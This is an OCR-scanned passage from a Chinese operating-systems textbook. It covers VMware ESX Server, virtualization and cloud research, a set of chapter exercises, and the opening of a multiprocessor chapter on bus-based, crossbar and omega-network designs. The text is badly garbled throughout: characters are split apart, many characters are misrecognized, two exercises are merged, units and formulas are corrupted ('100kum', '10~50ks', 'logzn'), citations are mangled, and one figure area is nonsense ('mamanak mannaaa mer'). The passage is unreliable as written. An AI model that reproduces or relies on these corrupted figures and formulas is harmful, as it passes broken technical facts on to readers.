时 ， 还 能 保证 虚拟 机 高 效 运行 。 为 了 实现 这 一 目标 ，ESX Server 首 先 引 入 了 气球 和 虚拟 机 透明 页 共享 
(Waldspurger, 2002), 

3) I/O 子 系统 为 性 能 进行 了 优化 。 虽 然 VMware Workstation 和 ESX Server 通 常 共 享 相同 的 前 端 ， 但 
是 后 端 完全 不 同 。 在 VMware Workstation 中 ， 所 有 I/O 流 经 宿主 操作 系统 及 其 API， 常 常 增加 额外 开销 ， 
特别 是 对 网 络 和 存储 设备 而 言 。 而 在 ESX Server 中 ， 设 备 驱动 程序 直接 运行 在 虚拟 机 管理 程序 里 ， 不 需 
要 系统 切换 。 

4) 后 端 通常 依赖 宿主 操作 系统 提供 的 抽象 ， 例 如 VMware Workstation 将 虚拟 机 磁盘 镜像 保存 为 宿主 
操作 系统 上 的 普通 文件 (只 是 体积 很 大 )。 相 比 之 下 ，ESX Server 具 有 VMFS (Vaghani，2010) ， 文 件 系 
统 专 门 为 保存 虚拟 机 镜像 和 保证 高 IO 吞吐 率 优化 。 这 能 极 大 地 提升 虚拟 机 的 性 能 。 例 如 ，VMware 在 
2011 年 演示 过 单一 ESX Server 每 秒 执行 100 万 次 磁盘 操作 (VMware, 2011), 

5) ESX Server 中 引入 新 功能 很 容易 ， 即 使 该 功能 需要 计算 机 中 多 个 部 件 进 行 特 定 配 置 与 密切 协作 。 
例如 ，ESX Server 引 入 的 VMotion， 这 是 首 个 虚拟 机 热 迁 移 解 决 方案 ， 能 将 正在 运行 的 虚拟 机 从 一 台 运 
行 ESX Server 的 机 器 迁移 到 另 一 台 运 行 着 ESX Server 的 机 器 。 这 项 工作 需要 内 存 管理 器 、CPU 调 度 器 和 
网 络 栈 的 相互 配合 。 

这 些 年 来 ，ESX Server 中 添加 了 不 少 新 功能 ， 并 演变 为 ESXi。ESXi 体 积 足够 小 ， 甚 至 能 预 装 到 服 
务 器 的 固件 中 。 今 天 ，ESXi 是 VMware 最 重要 的 产品 ， 是 vSphere 虚 拟 化 套装 的 基础 。 


7.13 有 关 虚 拟 化 和 云 的 研究 


虚拟 化 技术 和 云 计算 都 是 相当 活跃 的 研究 领域 。 这 两 个 领域 中 的 研究 成 果 不 胜 枚 举 ， 每 个 领域 都 有 
许多 学 术 会 议 。 例 如 ，Virtual Execution Environments (VEE) 会 议 关 注 最 广泛 意义 上 的 虚拟 化 ， 在 会 
议 上 你 可 以 找到 迁移 、 去 重 ; 系统 扩展 等 问题 的 相关 论文 。 类 似 的 ，ACM Symposium on Cloud 
Computing (SOCC) 是 最 知名 的 云 计 算 会 议 之 一 ， 其 中 的 论文 包括 对 故障 快速 恢复 、 数 据 中 心 任务 调度 、 
云 管理 和 调试 等 问题 的 研究 工作 。 

老 的 研究 主题 从 未 真正 凋零 ， 例 如 Penneman 等 人 (2013) 按照 Popek-Goldberg 准 则 审视 了 ARM 虚 
拟 化 中 的 问题 。 安 全 (Beham 等 人 ，2013; Mao, 2013; Pearce 等 人 ，2013) 和 节省 能 耗 (Botero 和 
Hesselbach，2013，Yuan 等 人 ，2013) 都 是 热门 话题 。 由 于 目前 相当 多 的 数据 中 心 使 用 虚拟 化 技术 ， 数 
据 中 心 的 机 器 间 的 网 络 连接 (Theodorou 等 人 ，2013) 也 是 一 个 主要 研究 主题 。 此 外 ， 无 线 网 络 中 的 虚 
拟 化 (Wang 等 人 ，2013a) 也 日 渐 重 要 。 

嵌 套 虚拟 化 (Ben-Yehuda 等 人 ，2010， Zhang 等 人 ，2011) 是 一 个 包含 众多 有 趣 研究 的 领域 。 其 
基本 想法 是 虚拟 机 本 身 可 以 继续 虚拟 化 成 多 个 更 高 层次 的 虚拟 机 ， 并 继续 嵌 套 虚拟 化 下 去 。 其 中 一 个 项 
目 名 为 Turtles， 因 为 嵌 套 虚拟 化 一 旦 开始 ， 便 将 “ 龟 龟 相 驮 以 至 无 穷 "。 

虚拟 化 硬件 的 一 个 好 处 是 不 可 信 代 码 能 直接 而 安全 地 访问 页 表 、TLB 等 硬件 功能 。 基 于 这 一 点 ， 
Dune 项 目 (Belay，2012) 提供 一 个 进程 抽象 而 不 是 机 器 抽象 。 进 程 可 以 进入 Dune 模 式 ， 这 一 不 可 逆 的 
转换 给 进程 以 访问 底层 硬件 的 权限 。 尽 管 如 此 ， 进 程 仍然 是 一 个 进程 ， 依 靠 内 核 并 与 之 交互 ， 唯 一 的 区 
别 是 改 为 使 用 VMCALL 指 令 来 进行 系统 调用 。 


习题 
1. 解释 为 什么 数据 中 心 关注 虚拟 化 技术 。 间 的 机 器 上 运行 虚拟 机 管理 程序 。 
2. 解释 为 什么 公司 会 希望 在 一 台 已 使 用 了 一 段 时 3. 解释 为 什么 软件 开发 者 会 在 用 于 开发 的 台式 机 
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上 使 用 虚拟 化 技术 。 

4. 解释 为 什么 家 庭 成 员 对 虚拟 化 技术 感 兴趣 。 

5. 你 认为 虚拟 化 技术 为 什么 经 过 很 长 时 间 才 变 得 
流行 起 来 ? 毕竟 ， 关 键 论 文 写 于 1974 年 m 
IBM 大 型 机 从 20 世 纪 70 年 代 开 始 就 有 了 必要 的 
软 硬 件 支持 。 

6. 列 出 两 类 Popek-Goldberg 意 义 上 的 敏感 指令 。 

7. 列 出 三 条 Popek-Goldberg 意 义 上 的 非 敏 感 指令 。 

8. 全 虚拟 化 和 半 虚 拟 化 有 什么 区 别 ? 你 认为 哪个 
更 难 实现 ?解释 你 的 答案 。 

9. 如 果 有 源 代 码 ， 半 虚拟 化 一 个 操作 系统 可 行 
吗 ? 如 果 没 有 源 代 码 呢 ? 

10. 考虑 可 以 同时 支持 最 多 ”个 虚拟 机 的 第 一 类 虚 
拟 机 管理 程序 ， 由 于 PC 磁盘 最 多 有 4 个 主 分 区 ， 
n 能 大 于 4 吗 ? 如 果 能 ， 数 据 如 何 保存 ? 

11. 简要 解释 进程 级 虚拟 化 的 概念 。 

12. 为 什么 会 存在 第 二 类 虚拟 机 管理 程序 ?毕竟 ， 
没有 什么 是 第 二 类 能 做 而 第 一 类 不 能 做 的 ， 而 
且 第 一 类 虚拟 机 管理 程序 通常 更 加 高 效 。 

13. 虚拟 化 对 第 二 类 虚拟 机 管理 程序 有 什么 用 ? 

14. 为 什么 会 出 现 二 进 制 翻 译 技术 ? 你 认为 这 种 技 
术 有 前 途 吗 ?解释 你 的 答案 。 

15. 解释 x86 的 四 个 特权 级 如 何 用 于 支持 虚拟 化 。 

16. 为 什么 基于 硬件 (支持 虚拟 化 技术 的 处 理 器 ) 
的 虚拟 化 方法 有 时 候 比 基于 二 进 制 翻 译 的 软件 
方法 性 能 更 差 ? 陈述 一 条 理由 。 

17. 举 一 个 例子 说 明 在 二 进 制 翻译 系统 中 ， 翻 译 后 
的 代码 可 能 比 原始 代码 运行 更 快 。 

18. VMware 每 次 二 进 制 翻译 一 个 基本 块 ， 执 行 这 个 
块 ， 再 翻译 下 一 个 。 能 提前 翻译 整个 程序 再 执 
行 吗 ? 如 果 能 的 话 ， 比 较 两 种 方式 的 优 缺 点 。 

19. 虚拟 机 管理 程序 和 微 内 核 有 什么 区 别 ? 

20. 简要 解释 为 什么 现实 中 难以 很 好 地 进行 虚拟 
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化 ? 解释 你 的 答案 。 

21. 在 一 台电 脑 上 运行 多 个 虚拟 机 需要 大 量 内 存 ， 
为 什么 ? 你 能 想到 什么 减少 内 存 使 用 的 方法 
吗 ? 解释 你 的 答案 。 

22. 解释 内 存 虚拟 化 中 使 用 的 影子 页 表 的 概念 。 

23. 一 种 处 理 客户 操作 系统 使 用 普通 (非特 权 ) 指 
令 修改 页 表 的 方法 是 将 页 表 标 记 为 只 读 ， 当 页 
表 被 修改 时 将 陷入 。 还 有 什么 其 他 方法 可 维护 
影子 页 表 ? 比较 你 的 方法 与 只 读 页 表 的 效率 。 

24. 为 什么 使 用 气球 驱动 程序 ?” 这 是 欺骗 吗 ? 

25. 描述 一 个 气球 驱动 程序 不 起 作用 的 情况 。 

26. 解释 内 存 虚 拟 化 中 使 用 的 去 重 概念 。 

27. 计算 机 几 十 年 来 一 直 使 用 DMA 进 行 1O， 在 1/O 
MMU 出 现 前 这 在 虚拟 化 中 导致 了 什么 问题 ? 

. 举 出 在 云 上 而 不 是 本 地 运行 程序 的 一 个 优点 和 
一 个 缺点 。 

29. 分 别 举 出 IAAS、PAAS、SAAS 的 一 个 例子 。 

30. 为 什么 虚拟 机 迁移 很 重要 ? 这 项 技术 在 什么 情 
况 下 有 用 ? 

. 迁移 虚拟 机 可 能 比 迁移 进程 更 容易 ， 但 仍然 比较 
困难 。 迁 移 虚拟 机 的 过 程 中 会 遇 到 什么 问题 ? 

. 为 什么 把 虚拟 机 从 一 台 机 器 迁移 到 另 一 台 机 器 比 
把 进程 从 一 台 机 器 迁移 到 另 一 台 机 器 更 容易 ? 

. 虚拟 机 热 迁 移 和 另 一 种 迁移 方式 ( 冷 迁 移 ) 的 
区 别 是 什么 ? 

34. 设计 VMware 时 考虑 的 三 个 主要 需求 是 什么 ? 

35. 为 什么 VMware Workstation 刚 面世 时 已 有 的 大 
量 外 围 设备 会 是 一 个 问题 ? 

. ESXi 体积 很 小 ， 为 什么 ?毕竟 数据 中 心中 的 
服务 器 通常 有 数 十 GB 内 存 ，VMware ESXi 多 
占用 或 少 占用 几 十 MB 内 存 的 区 别 在 哪里 ? 

37. 通过 网 络 搜索 ， 找 到 两 个 现实 中 的 虚拟 装置 的 

例子 。 
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从 计算 机 诞生 之 日 起 ， 人 们 对 更 强 计算 能 力 的 无 休止 的 追求 就 一 直 驱 使 着 计算 机 工业 的 发 展 。 
ENIAC 可 以 完成 每 秒 300 次 的 运算 ， 它 一 下 子 就 比 以 往 任何 计算 器 都 快 1000 多 倍 ， 但 是 人 们 并 不 满足 。 
我 们 现在 有 了 比 ENIAC 快 数 百 万 倍 的 机 器 ， 但 是 还 有 对 更 强大 机 器 的 需求 。 天 文学 家 们 正在 了 解 宇宙 ， 
生物 学 家 正在 试图 理解 人 类 基因 的 含义 ， 航 空 工程 师 们 致力 于 建造 更 安全 和 速度 更 快 的 飞机 ， 而 所 有 这 
一 切 都 需要 更 多 的 CPU 周期 。 然 而 ， 即 使 有 更 多 运算 能 力 ， 仍 然 不 能 满足 需求 。 

过 去 的 解决 方案 是 使 时 钟 走 得 更 快 。 但 是 ， 现 在 开始 遇 到 对 时 钟 速度 的 限制 了 。 按 照 爱 因 斯 坦 的 相 
对 论 ， 电 子 信号 的 速度 不 可 能 超过 光速 ， 这 个 速度 在 真空 中 大 约 是 30cm/ns， 而 在 铜 线 或 光纤 中 约 是 
20cm/ns。 这 在 计算 机 中 意味 着 10GHz 的 时 钟 ， 信 号 的 传送 距离 总 共 不 会 超过 2cm。 对 于 100GHz 的 计算 
机 ， 整 个 传送 路 径 长 度 最 多 为 2mm。 而 在 一 台 1THz (1000GHz) 的 计算 机 中 ， 传 送 距 离 就 不 足 100kum 了 ， 
这 在 一 个 时 钟 周期 内 正好 让 信号 从 一 端 到 另 一 端 并 返回 。 

让 计算 机 变 得 如 此 之 小 是 可 能 的 ， 但 是 这 会 遇 到 另 一 个 基本 问题 : 散热 。 计 算 机 运行 得 越 快 ， 产 生 的 
热量 就 越 多 ， 而 计算 机 越 小 就 越 难 散热 。 在 高 端 x86 系 统 中 ，CPU 的 散热 器 已 经 比 CPU 自身 还 要 大 了 。 总 而 
言 之 ， 从 1MHz 到 1GHz 需 要 的 是 更 好 的 芯片 制造 工艺 ， 而 从 1GHz 到 1THz 则 需要 完全 不 同 的 方法 。 

获得 更 高 速度 的 一 种 处 理 方式 是 大 规模 使 用 并 行 计 算 机 。 这 些 机 器 有 许多 CPU ， 每 一 个 都 以 “ 通 
常 ” 的 速度 (在 一 个 给 定年 份 中 的 速度 ) 运行 ， 但 是 总 体 上 会 有 比 单个 CPU 强大 得 多 的 计算 能 力 。 具 有 
成 千 上 万 个 CPU 的 系统 已 经 很 商业 化 了 。 在 未 来 十 年 中 ， 可 能 会 建造 出 具有 100 万 个 CPU 的 系统 
(Furber 等 人 ，2013) 。 当 然 为 了 获得 更 高 的 速度 ， 还 有 其 他 潜在 的 处 理 方式 ， 如 生物 计算 机 ， 但 在 本 章 
中 ， 我 们 将 专注 于 有 多 个 普通 CPU 的 系统 。 

在 高 强度 的 数据 处 理 中 经 常 采 用 高 度 并 行 计 算 机 。 如 天 气 预测 、 围 绕 机 愤 的 气流 建 模 、 世 界 经 济 模拟 
或 理解 大 脑 中 药物 - 受 体 的 相互 作用 等 问题 都 是 计算 密集 型 的 。 解 决 这 些 问 题 需要 多 个 CPU 同时 长 时 间 运 
行 。 在 本 章 中 讨论 的 多 处 理 机 系统 被 广泛 地 用 于 解决 这 些 问 题 以 及 在 其 他 科学 、 工 程 领域 中 的 类 似 问题 。 

另 一 个 相关 的 技术 进步 是 因特网 不 可 思议 地 快速 增长 。 因 特 网 最 初 被 设计 为 一 个 军用 的 容错 控制 系 
统 的 原型 ， 然 后 在 从 事 学 术 研 究 的 计算 机 科学 家 中 流行 开 来 ， 并 且 在 过 去 它 已 经 获得 了 许多 新 用 途 。 其 
中 一 种 用 途 是 ， 把 全 世界 的 数 千 台 计算 机 连接 起 来 ， 共 同 处 理 大 型 的 科学 问题 。 在 某 种 意义 上 ， 一 个 包 
含有 分 布 在 全 世界 的 1000 台 计算 机 的 系统 与 在 一 个 房间 中 有 1000 台 计算 机 的 系统 之 间 没 有 差别 ， 尽 管 这 
两 个 系统 在 延 时 和 其 他 技术 特征 方面 会 有 所 不 同 。 在 本 章 中 我 们 也 将 讨论 这 些 系统 。 

假如 有 足够 多 的 资金 和 足够 大 的 房间 ， 把 一 百 万 台 无 关 的 计算 机 放 到 一 个 房间 中 很 容易 做 到 。 把 一 
百 万 台 无 关 的 计算 机 放 到 全 世界 就 更 容易 了 ， 因 为 不 存在 空间 问题 了 。 当 要 在 一 个 房间 中 使 这 些 计算 机 
相互 通信 ， 以 便 共 同 处 理 一 个 问题 时 ， 问 题 就 出 现 了 。 结 果 ， 人 们 在 互 连 技术 方面 做 了 大 量 工 作 ， 而 且 
不 同 的 互 连 技术 已 经 导致 了 不 同性 质 的 系统 以 及 不 同 的 软件 组 织 。 

在 电子 (或 光学 ) 部 件 之 间 的 所 有 通信 ， 归 根 结 底 是 在 它们 之 间 发 送 消息 一 一 具有 良好 定义 的 位 串 
(bit string)。 其 差别 在 于 所 涉及 的 时 间 范 围 、 距 离 范围 和 膛 辑 组 织 。 一 个 极端 的 例子 是 共享 存储 器 多 处 
理 机 ， 系 统 中 有 从 2 个 到 1000 个 的 CPU 通过 一 个 共享 存储 器 通信 。 在 这 个 模型 中 ， 每 个 CPU 可 同样 访问 
整个 物理 存储 器 ， 可 使 用 指令 LOAD 和 STORE 读 写 单个 的 字 。 访 问 一 个 存储 器 字 通 常 需要 1~10ns。 尽 管 
这 个 模型 看 来 很 简单 ， 如 图 8-1a 所 示 ， 但 是 实际 上 要 实现 它 并 不 那么 简单 ， 而 且 通 常 涉及 底层 大 量 的 消 
息 传递 ， 这 一 点 我 们 会 简要 地 加 以 说 明 。 不 过 ， 该 消息 传递 对 于 程序 员 来 说 是 不 可 见 的 。 

其 次 是 图 8-1b 中 的 系统 ， 许 多 CPU 一 存储 器 通过 某 种 高 速 互连网 络 连接 在 一 起 。 这 种 系统 称 为 消息 
传递 型 多 计算 机 。 每 个 存储 器 局 部 对 应 一 个 CPU， 且 只 能 被 该 CPU 访 问 。 这 些 CPU 通 过 互连网 络 发 送 多 
字 消 息 通信 。 存 在 良好 的 连接 时 ， 一 条 短 消息 可 在 10~50ks 之 内 发 出 ， 但 是 这 仍然 比 图 8-1a 中 系统 的 存 
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储 器 访问 时 间 长 。 在 这 种 设计 中 没有 全 局 共享 的 存储 器 。 多 计算 机 (消息 传递 系统 ) be (共享 存储 器 ) 
多 处 理 机 系统 容易 构建 ， 但 是 编程 比较 困难 。 可 见 ， 每 种 类 型 各 有 其 优点 。 





图 8-1 a) 共享 存储 器 多 处 理 机 ，b) 消息 传递 多 计算 机 ，c) 广 域 分 布 式 系统 


第 三 种 模型 参见 图 8-1c， 所 有 的 计算 机 系统 都 通过 一 个 广域网 连接 起 来 ， 如 因特网 ， 构 成 了 一 个 
分 布 式 系统 (distributed system) 。 每 台 计算 机 有 自己 的 存储 器 ， 当 然 ， 通 过 消息 传递 进行 系统 通信 。 
图 8-1b 和 图 8-1c 之 间 真正 唯一 的 差别 是 , 后 者 使 用 了 完整 的 计算 机 而 且 消息 传递 时 间 通 常 需要 10~100ms。 
如 此 长 的 延迟 造成 使 用 这 类 松散 耦合 系统 的 方式 和 图 8-1b 中 的 紧密 耦合 系统 不 同 。 三 种 类 型 的 系统 在 通 
信 延 迟 上 各 不 相同 ， 分 别 有 三 个 数量 级 的 差别 。 类 似 于 一 天 和 三 年 的 差别 。 

本 章 有 三 个 主要 部 分 ， 分 别 对 应 于 图 8-1 中 的 三 个 模型 。 在 介绍 每 个 模型 时 ， 首 先 简要 介绍 相关 的 
硬件 ， 然 后 讨论 软件 ， 特 别 是 与 这 种 系统 类 型 有 关 的 操作 系统 问题 。 我 们 会 发 现 ， 每 种 情况 都 面临 着 不 
同 的 问题 并 且 需 要 不 同 的 解决 方法 。 


8.1 多 处 理 机 


共享 存储 器 多 处 理 机 (或 以 后 简称 为 多 处 理 机 ，multiprocessor) 是 这 样 一 种 计算 机 系统 ， 其 两 个 
或 更 多 的 CPU 全 部 共享 访问 一 个 公用 的 RAM。 运 行 在 任何 一 个 CPU 上 的 程序 都 看 到 一 个 普通 (通常 是 分 
页 ) 的 虚拟 地 址 空间 。 这 个 系统 唯一 特别 的 性 质 是 ，CPU 可 对 存储 器 的 某 个 字 写 和 人 某 个 值 ， 然 后 读 回 该 
字 ， 并 得 到 一 个 不 同 的 值 〈 因 为 另 一 个 CPU 改写 了 它 ) 。 在 进行 恰当 组 织 时 ， 这 种 性 质 构成 了 处 理 器 间 
通信 的 基础 : 一 个 CPU 向 存储 器 写 入 某 些 数据 而 另 一 个 读 取 这 些 数据 。 

至 于 最 重要 的 部 分 ， 多 处 理 机 操作 系统 只 是 通常 的 操作 系统 。 它 们 处 理 系 统 调用 ,进行 存储 器 管理 ， 
提供 文件 系统 并 管理 IO 设备 。 不 过 ， 在 某 些 领域 里 它们 还 是 有 一 些 独特 的 性 质 。 这 包括 进程 同步 、 资 
源 管理 以 及 调度 。 下 面 首先 概要 地 介绍 多 处 理 机 的 硬件 ， 然 后 进入 有 关 操 作 系统 的 问题 。 


8.1.1 多 处 理 机 硬件 

所 有 的 多 处 理 机 都 具有 每 个 CPU 可 访问 全 部 存储 器 的 性 质 ， 而 有 些 多 处 理 机 仍 有 一 些 其 他 的 特性 ， 即 
读 出 每 个 存储 器 字 的 速度 是 一 样 快 的 。 这 些 机 器 称 为 UMA (Uniform Memory Access， 统 一 存储 器 访问 ) 
多 处 理 机 。 相 反 ，NUMA (Nonuniform Memory Access， 非 一 致 存储 器 访问 ) 多 处 理 机 就 没有 这 种 特性 。 
至 于 为 何 有 这 种 差别 ， 稍 后 会 加 以 说 明 。 我 们 将 首先 考察 UMA 多 处 理 机 ， 然 后 讨论 NUMA 多 处 理 机 。 

1. 基于 总 线 的 UMA 多 处 理 机 体系 结构 

最 简单 的 多 处 理 机 是 基于 单 总 线 的 ， 参 见 图 8-2a。 两 个 或 更 多 的 CPU 以 及 一 个 或 多 个 存储 器 模块 都 
使 用 同一 个 总 线 进行 通信 。 当 一 个 CPU 需 要 读 一 个 存储 器 字 (memory word) 时 ， 它 首先 检查 总 线 忙 否 。 
如 果 总 线 空间 ， 该 CPU 把 所 需 字 的 地 址 放 到 总 线 上 ， 发 出 若干 控制 信号 ， 然 后 等 待 存储 器 把 所 需 的 字 放 
到 总 线 上 。 

当 某 个 CPU 需要 读 写 存储 器 时 ， 如 果 总 线 忙 ，CPU 只 是 等 待 ， 直 到 总 线 空 阅 。 这 种 设计 存在 问题 。 
在 只 有 两 三 个 CPU 时 ， 对 总 线 的 争夺 还 可 以 管理 ， 若 有 32 个 或 64 个 CPU 时 ， 就 不 可 忍受 了 。 这 种 系统 完 
全 受到 总 线 带宽 的 限制 ， 多 数 CPU 在 大 部 分 时 间 里 是 空闲 的 。 

这 一 问题 的 解决 方案 是 为 每 个 CPU 添 加 一 个 高 速 缓存 (cache)， 如 图 8-2b 所 示 。 这 个 高 速 缓存 可 以 
位 于 CPU 蕊 片 的 内 部 、CPU 附 近 、 在 处 理 器 板 上 或 所 有 这 三 种 方式 的 组 合 。 由 于 许多 读 操作 可 以 从 本 地 
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图 8-2 三 类 基于 总 线 的 多 处 理 机 : a) 没有 高 速 缓 存 ，b) 有 高 速 缓存 ，c) 有 高 速 缓 存 与 私有 存储 器 


高 速 缓存 上 得 到 满足 ， 总 线 流 量 就 大 大 减少 了 ， 这 样 系统 就 能 够 支持 更 多 的 CPU。 一 般 而 言 ， 高 速 缓存 
不 以 单个 字 为 基础 ， 而 是 以 32 字 节 或 64 字 节 块 为 基础 。 当 引用 一 个 字 时 ， 它 所 在 的 整个 数据 块 〈 叫 作 一 
个 cache 行 ) 被 取 到 使 用 它 的 CPU 的 高 速 缓存 当中 。 

每 一 个 高 速 缓存 块 或 者 被 标记 为 只 读 (在 这 种 情况 下 ， 它 可 以 同时 存在 于 多 个 高 速 缓存 中 ) ， 或 者 
标记 为 读 写 (在 这 种 情况 下 ， 它 不 能 在 其 他 高 速 缓 存 中 存在 ) 。 如 果 CPU 试 图 在 一 个 或 多 个 远程 高 速 组 
存 中 写 人 一 个 字 ， 总 线 硬件 检测 到 写 ， 并 把 一 个 信号 放 到 总 线 上 通知 所 有 其 他 的 高 速 缓 在。 如果 其 他 高 
速 缓存 有 个 “干净 ”的 副本 ， 也 就 是 同 存储 器 内 容 完 全 一 样 的 副本 ， 那 么 它们 可 以 丢弃 该 副本 并 让 写 者 
在 修改 之 前 从 存储 器 取出 高 速 缓存 块 。 如 果菜 些 其 他 高 速 绥 存 有 “ 脏 ”( 被 修改 过 ) 副本 ， 它 必须 在 处 
理 写 之 前 把 数据 写 回 存储 器 或 者 把 它 通过 总 线 直 接 传 送 到 写 者 上 。 高 速 缓存 这 一 套 规则 被 称 为 高 速 缓 存 
一 致 性 协议 ， 它 是 诸多 协议 之 一 。 

还 有 另 一 种 可 能 性 就 是 图 8-2c 中 的 设计 ， 在 这 种 设计 中 每 个 CPU 不 止 有 一 个 高 速 缓存 ， 还 有 一 个 本 地 
的 私有 存储 器 ， 它 通过 一 条 专门 的 (私有 ) 总 线 访问 。 为 了 优化 使 用 这 一 配置 ， 编 译 器 应 该 把 所 有 程序 的 
代码 、 字 符 串 、 常 量 以 及 其 他 只 读数 据 、 栈 和 局 部 变量 放 进 私有 存储 器 中 。 而 共享 存储 器 只 用 于 可 写 的 共 
享 变量 。 在 多 数 情况 下 ， 这 种 仔细 的 放置 会 极 大 地 减少 总 线 流量 ， 但 是 这 样 做 需要 编译 器 的 积极 配合 。 

2. 使 用 交叉 开关 的 UMA 多 处 理 机 

即使 有 最 好 的 高 速 缓存 ， 单 个 总 线 的 使 用 还 是 把 UMA 多 处 理 机 的 数量 限制 在 16 至 32 个 CPU。 要 超 
过 这 个 数量 ， 就 需要 新 的 互连网 络 。 连 接 n 个 CPU 到 k 个 存储 器 的 最 简单 的 电路 是 交叉 开关 ， 参 见 图 8-3。 
交叉 开关 在 电话 交换 系统 中 已 经 采用 了 几 十 年 ， 用 于 把 一 组 进 线 以 任意 方式 连接 到 一 组 出 线 上 。 


交叉 点 开关 打开 


交叉 点 开关 关闭 





关闭 的 交叉 点 开关 


t 
打开 的 交叉 点 开关 


a) 
图 8-3 a) 8 x 8 交叉 开关 ， b) 打开 的 交叉 点 ;Cc) 闭合 的 交叉 点 
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水 平 线 ( 进 线 ) 和 垂直 线 (出 线 ) 的 每 个 相交 位 置 上 是 一 个 交叉 点 〈crosspoint) 。 交 叉 点 是 一 个 小 
的 电子 开关 ， 具 体 取决 于 水 平 线 和 垂直 线 是 否 需要 连接 。 在 图 8-3a 中 我 们 看 到 有 三 个 交叉 点 同时 闭合 ， 
允许 (CPU， 存 储 器 ) 对 (010, 000), (101, 101) 和 (110, O10) 同时 连接 。 其 他 的 连接 也 是 可 能 的 。 
事实 上 ， 组 合 的 数量 等 于 象棋 盘 上 8 个 棋子 安全 放置 方式 的 数量 (8 皇后 问题 ) 。 

交叉 开关 最 好 的 一 个 特性 是 它 是 一 个 非 阻塞 网 络 ， 即 不 会 因 有 些 交叉 点 或 连 线 已 经 被 占据 了 而 拒绝 
连接 (假设 存储 器 模块 自身 是 可 用 的 ) 。 并 非 所 有 的 互 连 方式 都 是 非 阻 塞 的 ， 而 且 并 不 需要 预先 的 规划 。 
即使 已 经 设置 了 7 个 任意 的 连接 ， 还 有 可 能 把 剩余 的 CPU 连接 到 剩余 的 存储 器 上 。 

当然 ， 当 两 个 CPU 同时 试图 访问 同一 个 模块 的 时 候 ， 对 内 存 的 竞争 还 是 可 能 的 。 不 过 ， 通 过 将 内 存 
分 为 n 个 单元 ， 与 图 8-2 的 模型 相 比 ， 这 样 的 争夺 概率 可 以 降 至 1/n。 

交叉 开关 最 差 的 一 个 特性 是 ， 交 叉 点 的 数量 以 方式 增长 。 若 有 1000 个 CPU 和 1000 个 存储 器 我 们 就 
需要 一 百 万 个 交叉 点 。 这 样 大 数量 的 交叉 开关 是 不 可 行 的 。 不 过 ， 无 论 如 何 对 于 中 等 规模 的 系统 而 言 ， 
交叉 开关 的 设计 是 可 用 的 。 

3. 使 用 多 级 交换 网 络 的 UMA 多 处 理 机 

有 一 种 完全 不 同 的 、 基 于 简单 2 x 2 开关 的 多 处 理 机 设计 ， 参 见 图 8-4a。 这 个 开关 有 两 个 输入 和 两 个 
输出 。 到 达 任 意 一 个 输入 线 的 消息 可 以 被 交换 至 。 ais Ld, Sain eee | 
mamanak mannaaa mer | [y (i [ois Tose | ate 


由 四 个 部 分 组 成 ， 参 见 图 8-4b。Module (模块 ) x 


域 指明 使 用 哪个 存储 器 。Address (地 址 ) 域 指 a 
定 在 模块 中 的 地 址 。 Opcode (操作 码 ) 给 定 了 84 a) 一 个 带 有 A 和 B 两 个 输入 线 以 及 X 和 Y 
操作 ， 如 READ 或 WRITE。 最 后 ， 在 可 选 的 两 个 输出 线 的 2 x 2 的 开关 ; b) 消息 格式 


Value ( 值 ) 域 中 可 包含 一 个 操作 数 ， 比 如 一 个 
要 被 WRITE 写 入 的 32 位 字 。 该 开关 检查 Module 域 并 利用 它 确 定 消息 是 应 该 送 给 X 还 是 发 送 给 Y。 

这 个 2x2 开 关 可 有 多 种 使 用 方式 ， 用 以 构建 大 型 的 多 级 交换 网 络 (Adams $A, 1987; Bhuyan 等 
A, 1989, Garofalakis#ilStergiou , 2013 Kuman 和 Reddy，1987) 。 有 一 种 是 简单 经 济 的 omega 网 络 ， 见 图 
8-5。 这 里 采用 了 12 个 开关 ， 把 8 个 CPU 连接 到 8 个 存储 器 上 。 推 而 广 之 ， 对 于 "个 CPU 和 mm 个 存储 器 ， 我 们 
将 需要 logzn 级 ， 每 级 n/2 个 开关 ， 总 数 为 (n/2) logzn 个 开关 ， 比 rw 个 交叉 点 要 好 得 多 ， 特 别 是 当 n 值 很 大 时 。 

Omega 网 络 的 接线 模式 常 被 称 作 全 混 洗 (perfect shuffle) ， 因 为 每 一 级 信号 的 混合 就 像 把 一 副 牌 分 
成 两 半 ， 然 后 再 把 牌 一 张 张 混合 起 来 。 接 着 看 看 Omega 网 络 是 如 何 工作 的 ， 假 设 CPU 011 打 算 从 存储 器 
模块 110 读 取 一 个 字 。CPU 发 送 READ 消 息 给 开关 1D， 它 在 Module 域 包含 110。1D 开 关 取 110 的 首位 (最 
左 位 ) 并 用 它 进行 路 由 处 理 。0 路 由 到 上 端 输出 ， 而 1 的 路 由 到 下 端 ， 由 于 该 位 为 1!1， 所 以 消息 通过 低 端 
输出 被 路 由 到 2D。 

所 有 的 第 二 级 开关 ， 包 括 2D， 取 用 第 二 个 比特 位 进行 路 由 。 这 一 位 还 是 1， 所 以 消息 通过 低 端 输出 
转发 到 3D。 在 这 里 对 第 三 位 进行 测试 ， 结 果 发 现 是 0。 于 是 ， 消 息 送 往 上 端 输出 ， 并 达到 所 期 望 的 存储 
器 110。 该 消息 的 路 径 在 图 8-5 中 由 字母 a 标 出 。 





CPU 存储 器 





图 8-5 Omega 交换 网 络 
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在 消息 通过 交换 网 络 之 后 ， 模 块 号 的 左 端的 位 就 不 再 需要 了 。 它 们 可 以 有 很 好 的 用 途 ， 可 以 用 来 
记录 入 线 编 号 ， 这 样 ， 应 答 消息 可 以 找到 返回 路 径 。 对 于 路 径 a， 入 线 编号 分 别 是 0 (向 上 输入 到 1D)、 
1 ( 低 输入 到 2D) 和 1 ( 低 输入 到 3D) 。 使 用 011 作 为 应 答 路 由 ， 只 要 从 右 向 左 读 出 每 位 即 可 。 

与 此 同时 ，CPU 001 需 要 往 存 储 器 001 里 写 入 一 个 字 。 这 里 发 生 的 情况 与 上 面 的 类 似 ， 消 息 分 别 通 
过 上 上、 上、 下端 输出 路 由 ， 由 字母 b 标 出 。 当 消息 到 达 时 ， 从 Module 域 读 出 001， 代 表 了 对 应 的 路 径 。 由 
于 这 两 个 请 求 不 使 用 任何 相同 的 开关 、 连 线 或 存储 器 模块 ， 所 以 它们 可 以 并 行 工 作 。 

现在 考虑 如 果 CPU 000 同 时 也 请 求 访问 存储 器 模块 000 会 发 生 什 么 情况 。 这 个 请 求 会 与 CPU 001 的 请 
求 在 开关 3A 处 发 生 冲 突 。 它 们 中 的 一 个 就 必须 等 待 。 和 交叉 开关 不 同 ，omega 网 络 是 一 种 阻塞 网 络 ， 并 
